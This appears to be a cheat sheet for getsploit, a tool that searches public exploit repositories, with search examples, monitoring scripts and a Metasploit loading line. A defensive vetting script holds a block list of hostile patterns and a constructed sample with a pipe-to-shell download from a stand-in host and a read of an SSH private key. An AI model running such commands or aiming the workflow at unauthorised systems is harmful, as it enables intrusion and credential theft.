
getsploit

Overview

getsploit is a command-line tool that searches and downloads exploit code from multiple repositories including Exploit-DB, Metasploit Framework, and Packet Storm Security. It aggregates exploit intelligence for vulnerability research and authorized penetration testing activities.

getsploit is essential for:

  • Exploit proof-of-concept research
  • Vulnerability validation and verification
  • Penetration testing and assessment
  • Exploit code adaptation and customization
  • Security research and analysis
  • Attack surface evaluation

Installation

Prerequisites

  • Python 3.6+
  • pip (Python package manager)
  • Linux/macOS/Windows
  • Internet connectivity

Install via pip

# Install from PyPI
pip install getsploit

# Verify installation
getsploit -V
getsploit --help

Install from Source

# Clone repository
git clone https://github.com/vulhub/getsploit.git
cd getsploit

# Install dependencies
pip install -r requirements.txt

# Run directly
python -m getsploit --help

# Or install locally
pip install -e .

Update

# Update to latest version
pip install --upgrade getsploit

# Check version
getsploit --version

Core Commands

Basic Usage

| Command | Purpose | Example |
|---|---|---|
| getsploit <query> | Search for exploits | getsploit apache 2.4.49 |
| getsploit -h | Show help | getsploit -h |
| getsploit -V | Show version | getsploit -V |
| getsploit --update | Update exploit database | getsploit --update |

Search Options

| Option | Purpose | Example |
|---|---|---|
| -e, --edb | Search Exploit-DB only | getsploit -e "CVE-2021-1234" |
| -m, --msf | Search Metasploit only | getsploit -m "windows privilege" |
| -p, --pst | Search Packet Storm only | getsploit -p "php vulnerability" |
| -t, --type | Filter by exploit type | getsploit -t "remote" apache |

Basic Search Operations

# Search all repositories
getsploit apache 2.4.49

# Search by CVE number
getsploit CVE-2021-44228

# Search by application
getsploit wordpress

# Search by vulnerability type
getsploit "remote code execution"

Search with Repository Filter

# Search Exploit-DB only
getsploit -e "nginx privilege escalation"

# Search Metasploit only
getsploit -m "windows domain privilege"

# Search Packet Storm only
getsploit -p "php injection"

Filter by Exploit Type

# Find remote code execution exploits
getsploit -t "remote" "apache"

# Find local privilege escalation
getsploit -t "local" "kernel"

# Find denial of service
getsploit -t "dos" "dns"

Exploit Database Search Strategies

Search by Vulnerability

# SQL injection exploits
getsploit "sql injection" wordpress

# Cross-site scripting
getsploit "xss" "drupal"

# Path traversal
getsploit "path traversal" php

# Command injection
getsploit "command injection" web

Search by Application

# WordPress vulnerabilities
getsploit wordpress

# Drupal exploits
getsploit drupal

# Apache web server
getsploit apache

# PHP framework vulnerabilities
getsploit laravel

Search by OS/Platform

# Windows privilege escalation
getsploit -t "local" "windows"

# Linux kernel exploits
getsploit -t "local" "linux kernel"

# macOS vulnerabilities
getsploit -t "remote" "macos"

Advanced Search Techniques

Multi-Term Searches

# Combine application and version
getsploit "apache 2.4.49"

# With vulnerability type
getsploit "wordpress 5.0 remote"

# Application and CVE
getsploit "wordpress CVE-2020"

Specific CVE Research

# Log4j vulnerability (widespread)
getsploit CVE-2021-44228

# WordPress plugin vulnerability
getsploit CVE-2020-6450

# Kernel privilege escalation
getsploit CVE-2021-22555

Vulnerability Pattern Searches

# All Struts vulnerabilities
getsploit "apache struts"

# Tomcat exploits
getsploit "tomcat"

# Node.js vulnerabilities
getsploit "node.js" -t "remote"

Download and Extraction

Download Exploit Code

# Search returns exploit information
getsploit apache 2.4.49

# Output shows:
# - Exploit ID
# - Title
# - Type
# - Link to code
# - Source repository

View Exploit Details

# Search with verbose output
getsploit -v apache 2.4.49

# Review exploit information before download
# - Author
# - Verification status
# - Last updated date

Save Search Results

# Redirect output to file
getsploit wordpress > wordpress_exploits.txt

# Save specific results
getsploit -e "sql injection" > edb_sqli.txt

# Parse results programmatically
# (-i matches identifiers regardless of case, e.g. CVE-... as well as cve-...)
getsploit apache 2.4.49 | grep -oiE "exploit-[0-9]+|cve-[0-9-]+"

Practical Exploitation Workflows

Vulnerability Assessment Workflow

# 1. Identify target technology
# Example: WordPress 5.0 running

# 2. Search for known vulnerabilities
getsploit "wordpress 5.0"

# 3. Review exploit types
getsploit -e "wordpress 5.0" | grep -i "plugin\|theme"

# 4. Download promising exploits
# (Follow links from search results)

# 5. Analyze code for applicability
# (Test in lab environment first)

Known CVE Exploitation

# 1. Identify CVE
# Example: CVE-2021-44228 (Log4j)

# 2. Find exploits
getsploit CVE-2021-44228

# 3. Search specific sources
getsploit -m CVE-2021-44228    # Metasploit modules
getsploit -e CVE-2021-44228    # Exploit-DB POCs

# 4. Select appropriate exploit
# (Choose by platform, method, complexity)

Application-Specific Research

# 1. Identify running application
# Example: Apache Struts 2.0

# 2. Search comprehensively
getsploit "apache struts"

# 3. Filter by vulnerability type
getsploit -t "remote" "apache struts"

# 4. Research by year
getsploit "struts 2009"  # Earlier vulnerabilities
getsploit "struts 2017"  # More recent exploits

Integration with Other Tools

Chain with Metasploit

# Find exploit in Metasploit
getsploit -m "apache struts"

# Get module path from results
# Load in msfconsole (-x runs console commands; -m only adds a module search directory)
msfconsole -q -x "use exploit/linux/http/apache_struts_rce"

Integration with searchsploit

# Alternative: Use searchsploit (locally cached)
searchsploit "apache struts"

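# Cross-reference with getsploit
# (-F treats each searchsploit line as a fixed string; -f keeps an empty
#  searchsploit result from turning into an empty pattern that hides every line)
getsploit "apache struts" | grep -vFf <(searchsploit -t apache struts)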

Organize Results for Testing

# Save organized results
mkdir -p exploit_research/wordpress
getsploit wordpress > exploit_research/wordpress/search_results.txt

mkdir -p exploit_research/drupal
getsploit drupal > exploit_research/drupal/search_results.txt

# Create index
echo "# Exploit Research Results" > exploit_research/README.md

Exploit Classification and Analysis

Classify by Exploitation Method

# Remote code execution
getsploit -t "remote" "application"

# Privilege escalation
getsploit -t "local" "privilege"

# Denial of service
getsploit -t "dos" "service"

# Authentication bypass
getsploit "authentication bypass" app

Analyze Exploit Reliability

# Search for verified/tested exploits
getsploit -e "apache"        # Exploit-DB (verified)

# Search for modules
getsploit -m "wordpress"     # Metasploit (tested)

# Review multiple sources
getsploit -p "wordpress"     # Packet Storm (research)

Filter by Exploit Status

# Recently added exploits
getsploit -e "2024" wordpress

# Older, battle-tested exploits
getsploit -e "2015" linux

# Compare exploit counts
getsploit -m "apache" | wc -l
getsploit -e "apache" | wc -l

Automation Scripts

Batch Vulnerability Scanning

#!/bin/bash
# Search for exploits for multiple CVEs

CVES=(
  "CVE-2021-44228"
  "CVE-2021-22555"
  "CVE-2020-1938"
)

OUTPUT_DIR="cve_research"
mkdir -p "$OUTPUT_DIR"

for cve in "${CVES[@]}"; do
  echo "Researching $cve..."
  getsploit "$cve" > "$OUTPUT_DIR/${cve}_results.txt"
  
  # Count exploits found
  COUNT=$(wc -l < "$OUTPUT_DIR/${cve}_results.txt")
  echo "$cve: $COUNT results found"
done

Vulnerability Database Builder

#!/bin/bash
# Build database of exploits for target technologies

TARGETS=(
  "wordpress"
  "drupal"
  "joomla"
  "apache"
  "nginx"
)

DB_DIR="exploit_database"
mkdir -p "$DB_DIR"

for target in "${TARGETS[@]}"; do
  echo "Building database for $target..."
  
  # Search all sources
  getsploit -e "$target" > "$DB_DIR/${target}_edb.txt"
  getsploit -m "$target" > "$DB_DIR/${target}_msf.txt"
  getsploit -p "$target" > "$DB_DIR/${target}_pst.txt"
  
  # Create summary
  TOTAL=$(($(wc -l < "$DB_DIR/${target}_edb.txt") + \
           $(wc -l < "$DB_DIR/${target}_msf.txt") + \
           $(wc -l < "$DB_DIR/${target}_pst.txt")))
  
  echo "$target: $TOTAL exploits indexed"
done

Continuous Vulnerability Monitoring

#!/bin/bash
# Monitor new exploits for critical applications

MONITOR_TARGETS=(
  "wordpress"
  "apache"
  "openssh"
)

RESULTS_DIR="vulnerability_monitoring"
mkdir -p "$RESULTS_DIR"

DATE=$(date +%Y%m%d)

for target in "${MONITOR_TARGETS[@]}"; do
  LATEST_FILE="$RESULTS_DIR/${target}_latest.txt"
  CURRENT_FILE="$RESULTS_DIR/${target}_${DATE}.txt"
  
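  # Get current exploits
  getsploit "$target" | sort > "$CURRENT_FILE"

  # Keep the previous baseline if the search failed or returned nothing
  if [ ! -s "$CURRENT_FILE" ]; then
    echo "No results for $target; baseline unchanged" >&2
    rm -f "$CURRENT_FILE"
    continue
  fi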
  
  # Compare with previous
  if [ -f "$LATEST_FILE" ]; then
    NEW_EXPLOITS=$(comm -13 "$LATEST_FILE" "$CURRENT_FILE")
    if [ -n "$NEW_EXPLOITS" ]; then
      echo "New exploits for $target:"
      echo "$NEW_EXPLOITS"
    fi
  fi
  
  # Update latest
  cp "$CURRENT_FILE" "$LATEST_FILE"
done

Search Result Analysis

Parse Search Results

# Extract exploit IDs
getsploit apache | grep -oE "EDB-[0-9]+" | sort -u

# Extract CVE references
getsploit wordpress | grep -oE "CVE-[0-9-]+" | sort -u

# Count results by type
getsploit apache | grep -c "remote"
getsploit apache | grep -c "local"

Compare Sources

# Find exploits in Exploit-DB
getsploit -e wordpress > edb_wp.txt

# Find exploits in Metasploit
getsploit -m wordpress > msf_wp.txt

# Find unique to Exploit-DB
comm -23 <(sort edb_wp.txt) <(sort msf_wp.txt)

# Find in all sources
getsploit wordpress | sort -u > all_wp.txt

Best Practices

Responsible Exploit Research

  • Verify applicability: Confirm vulnerability affects target before exploitation
  • Test in isolated lab: Always test in controlled environment first
  • Review exploit code: Analyze code for malicious intent before execution
  • Maintain documentation: Track exploit usage for reporting
  • Only test authorized targets: Ensure proper authorization before testing
  • Keep audit trail: Document all exploit testing activities
  • Update regularly: Keep exploit database current with --update
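
One way to apply the "Review exploit code" and "Keep audit trail" points above to files saved from search results, as an added example that is not part of getsploit or of the original page. The function names, the rule list and both sample files are constructed for illustration, and `sha256sum` from coreutils is assumed.

```sh
#!/bin/sh
# Added example, not part of getsploit. Rule list is illustrative, not complete.

# triage_poc FILE: print "rule:line:text" per hit; return 0 clean, 1 flagged
triage_poc() {
  [ -r "$1" ] || { echo "unreadable: $1" >&2; return 2; }
  flagged=0
  while read -r label regex; do
    hits=$(grep -nE -- "$regex" "$1") || continue
    printf '%s\n' "$hits" | sed "s/^/$label:/"
    flagged=1
  done <<'EOF'
pipe-to-shell (curl|wget)[^|]*\|[[:space:]]*(ba|z)?sh
encoded-exec base64[[:space:]]+(-d|--decode)|b64decode
destructive-fs rm[[:space:]]+-[a-zA-Z]*r[a-zA-Z]*[[:space:]]+(/|~)
credential-paths \.ssh/|/etc/shadow|\.aws/credentials
EOF
  return "$flagged"
}

# vet_poc FILE LOG: triage FILE and append "UTC-time sha256 verdict path" to
# LOG as the audit record; returns 0 only when no rule matched
vet_poc() {
  if findings=$(triage_poc "$1"); then verdict=clean; else verdict=flagged; fi
  sum=$(sha256sum "$1" | cut -d' ' -f1)
  printf '%s %s %s %s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$sum" "$verdict" "$1" >> "$2"
  [ -z "$findings" ] || printf '%s\n' "$findings"
  [ "$verdict" = clean ]
}

# make_samples DIR: write two constructed files standing in for downloaded PoCs
make_samples() {
  cat > "$1/poc_a.sh" <<'EOF'
#!/bin/sh
# constructed sample: banner check with an unrelated second stage appended
echo "checking server banner"
curl -s http://example.invalid/stage2 | sh
cat ~/.ssh/id_rsa
EOF
  cat > "$1/poc_b.py" <<'EOF'
# constructed sample: version comparison only
import sys
print("affected" if sys.argv[1] == "2.4.49" else "not affected")
EOF
}

lab=$(mktemp -d) && make_samples "$lab"
for f in "$lab/poc_a.sh" "$lab/poc_b.py"; do
  vet_poc "$f" "$lab/audit.log" || echo "HOLD: read $f by hand before running it"
done
```

A clean verdict only means none of these patterns matched; the log line ties each verdict to the exact file content through its hash.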

Effective Search Strategies

  • Use specific terms: More specific searches yield relevant results
  • Include version numbers: Narrow results with application versions
  • Cross-reference CVEs: Verify CVE numbers with multiple sources
  • Search all repositories: Different sources contain unique exploits
  • Review metadata: Check author, date, and verification status
  • Compare multiple exploits: Select most reliable implementation

Troubleshooting

| Issue | Solution |
|---|---|
| No results found | Try broader search terms or different keywords |
| Connection errors | Check internet connectivity; verify target is accessible |
| Old database | Run getsploit --update to refresh exploit database |
| Exploit not found | Try searching by CVE number or different terms |
| Metasploit results | Verify Metasploit Framework installation for module paths |

Update and Maintenance

Keep Database Current

# Update exploit database
getsploit --update

# Schedule regular updates (cron)
0 0 * * * /usr/local/bin/getsploit --update  # Daily at midnight

Summary

getsploit aggregates exploit intelligence from multiple authoritative sources:

  1. Exploit-DB - Largest public exploit repository
  2. Metasploit Framework - Professional exploitation platform
  3. Packet Storm Security - Historical vulnerability research

Key capabilities include:

  • Multi-repository exploit searching
  • Flexible filtering by type and source
  • CVE-based vulnerability research
  • Integration with exploitation frameworks
  • Automated vulnerability monitoring

Use getsploit to research known vulnerabilities, validate attack vectors, and build exploit collections for authorized penetration testing and security assessment activities.